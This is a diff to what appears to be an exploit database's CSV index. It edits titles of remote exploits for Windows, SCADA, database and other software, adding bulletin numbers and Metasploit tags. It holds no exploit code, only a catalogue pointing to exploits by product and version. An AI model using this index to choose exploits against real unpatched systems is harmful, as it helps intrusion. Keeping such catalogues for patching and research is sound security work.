4094,platforms/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 @@ -9421,7 +9430,7 @@ id,file,description,date,author,platform,type,port 4348,platforms/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0 -4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 +4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)",2007-09-03,"Patrick Webster",windows,remote,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote,0 @@ -9486,7 +9495,7 @@ id,file,description,date,author,platform,type,port 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 -4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 +4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",hardware,remote,0 @@ -9510,7 +9519,7 @@ id,file,description,date,author,platform,type,port 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Buffer Overflow",2008-01-16,rgod,windows,remote,0 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 -4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow",2008-01-18,"Marcin Kozlowski",windows,remote,0 +4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0 @@ -9947,7 +9956,7 @@ id,file,description,date,author,platform,type,port 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote,0 -9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC)",2009-10-15,Skylined,windows,remote,80 +9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)",2009-10-15,Skylined,windows,remote,80 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,windows,remote,80 9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80 @@ -10160,7 +10169,7 @@ id,file,description,date,author,platform,type,port 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - (PoC)",2010-06-09,Unknown,multiple,remote,0 -13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 +13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 @@ -10232,7 +10241,7 @@ id,file,description,date,author,platform,type,port 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 -14886,platforms/windows/remote/14886.py,"Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 +14886,platforms/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (2)",2010-09-03,Abysssec,windows,remote,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Exploit",2010-11-17,Dr_IDE,windows,remote,0 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0 @@ -10250,7 +10259,7 @@ id,file,description,date,author,platform,type,port 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0 15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote,0 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 -15213,platforms/asp/remote/15213.pl,"ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 +15213,platforms/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow",2010-10-11,"xsploited security",windows,remote,0 @@ -10258,10 +10267,10 @@ id,file,description,date,author,platform,type,port 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow",2010-10-12,"xsploited security",windows,remote,0 15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Parameter Buffer Overflow",2010-10-13,Skylined,windows,remote,0 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 -15265,platforms/asp/remote/15265.rb,"ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 -15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0 +15265,platforms/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 +15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",windows,remote,0 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 -15292,platforms/windows/remote/15292.rb,"ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 +15292,platforms/windows/remote/15292.rb,"Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory Corruption",2010-10-21,Abysssec,windows,remote,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 @@ -10360,7 +10369,7 @@ id,file,description,date,author,platform,type,port 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0 16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 -16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",2010-11-24,Metasploit,multiple,remote,0 +16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank 'file://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 @@ -10376,12 +10385,12 @@ id,file,description,date,author,platform,type,port 16305,platforms/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation (Metasploit)",2010-09-27,Metasploit,multiple,remote,0 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 -16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 -16310,platforms/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 +16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)",2010-09-20,Metasploit,multiple,remote,0 +16310,platforms/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String (Metasploit)",2010-11-30,Metasploit,linux,remote,0 -16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 +16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16314,platforms/multiple/remote/16314.rb,"Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 -16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 +16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote,0 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0 @@ -10399,8 +10408,8 @@ id,file,description,date,author,platform,type,port 16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (Metasploit)",2010-04-28,Metasploit,windows,remote,0 -16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote,0 +16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow Exploit (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -10421,30 +10430,30 @@ id,file,description,date,author,platform,type,port 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16354,platforms/windows/remote/16354.rb,"Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 -16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16357,platforms/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16357,platforms/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16358,platforms/windows/remote/16358.rb,"Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16359,platforms/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16360,platforms/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution (Metasploit)",2010-09-21,Metasploit,windows,remote,0 -16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0 -16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0 -16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit)",2010-09-28,Metasploit,windows,remote,0 -16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit)",2011-02-17,Metasploit,windows,remote,0 -16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066)",2010-05-09,Metasploit,windows,remote,0 +16359,platforms/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16360,platforms/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)",2010-09-21,Metasploit,windows,remote,0 +16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)",2011-02-17,Metasploit,windows,remote,0 +16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)",2011-01-21,Metasploit,windows,remote,0 +16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow Exploit (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 +16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)",2011-02-17,Metasploit,windows,remote,0 +16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 -16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066)",2010-08-25,Metasploit,windows,remote,0 +16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,windows,remote,0 +16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,windows,remote,0 -16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 +16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 -16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)",2010-07-25,Metasploit,windows,remote,0 -16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC - Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 @@ -10452,20 +10461,20 @@ id,file,description,date,author,platform,type,port 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 -16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 +16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)",2010-07-03,Metasploit,hardware,remote,0 16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (Metasploit)",2011-01-24,Metasploit,windows,remote,0 -16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection)",2011-02-08,Metasploit,windows,remote,0 +16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)",2011-01-24,Metasploit,windows,remote,0 +16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0 16395,platforms/windows/remote/16395.rb,"Microsoft SQL Server - Payload Execution (Metasploit)",2010-12-21,Metasploit,windows,remote,0 -16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection)",2011-02-08,Metasploit,windows,remote,0 +16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 +16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Overflow Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -10474,19 +10483,19 @@ id,file,description,date,author,platform,type,port 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2)",2010-11-03,Metasploit,windows,remote,0 +16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (2)",2010-11-03,Metasploit,windows,remote,0 16410,platforms/windows/remote/16410.rb,"Computer Associates - Alert Notification Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3)",2010-11-03,Metasploit,windows,remote,0 